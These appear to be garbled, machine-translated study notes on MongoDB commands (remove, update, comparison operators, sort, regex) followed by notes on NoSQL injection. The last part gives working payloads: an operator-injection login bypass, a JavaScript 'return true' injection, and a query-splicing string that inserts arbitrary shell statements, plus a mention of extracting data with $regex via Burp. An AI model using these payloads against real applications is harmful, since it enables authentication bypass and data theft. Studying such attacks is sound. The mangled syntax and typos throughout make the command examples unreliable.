mongodb command
to delete a document, db collection name .remove ({key: value}).
update documents, db collection name .update ({updated target}, {$ set: {}} for updated content). The default only updating the detected first document
updates to all matching documents, db collection name .update. ({updated target}, {$ set: {updated content}}, {multi: ture} )
mongodb greater than less than
equal, {1: 1}, colon
less than, {0: {$ lt: 1}}, 0 less than 1
less than, or equal to, {0: {$ lte: 1}}, 0 less than or equal to a
greater than {1: {$ gt: 0 }}, 1 is greater than 0
is greater than or equal to {1: {$ gte: 0 }}, 1 is greater than or equal to 0
is not equal to {1: {$ ne: 0 }}, 1 is not equal to 0
{1: {$ gt: 0 }, $ or: [{1: 1}, {0: 0}]}, 1 and greater than 0 (=. 1. 1) or 0 = 0
db.col.find ({}, { "title": 1, _id : 0}) sort ({ "likes": - 1}.), col data set in descending order according to the field likes
db.col.find ({}, { "title ": 1 , _id:. 0}) sort ({ "likes": 1}), col data set are arranged in ascending descending field likes
Regular match: $ regex operator to set the string matching the regular expression
db collection name .find. ({Name: {$ regex: "^ h"}}), a regular query beginning h, ^ represents the beginning of what
nosql injection javascript injection, directly into the malicious code reaches under attack js statement object
overlay, never really formula injection
username [$ NE] =. 1 & password [$ NE] =. 1
username = 1'return to true; var B = '$ password = 1
mongodb shell splicing injection
using the " 'query other closed, after insertion of the statement to be executed, it is arbitrary statements, to be successful in the need to know the name of the database set
db.messages.find ({" author ":" "}). Sort ({ "AddTime": -. 1})
"}); db.messages.insert ({" name ":" hahaha "}); db.messages.find ({" author ":" 2
BP carried out using injection attack to obtain data
required to use $ regex to acquire data in the system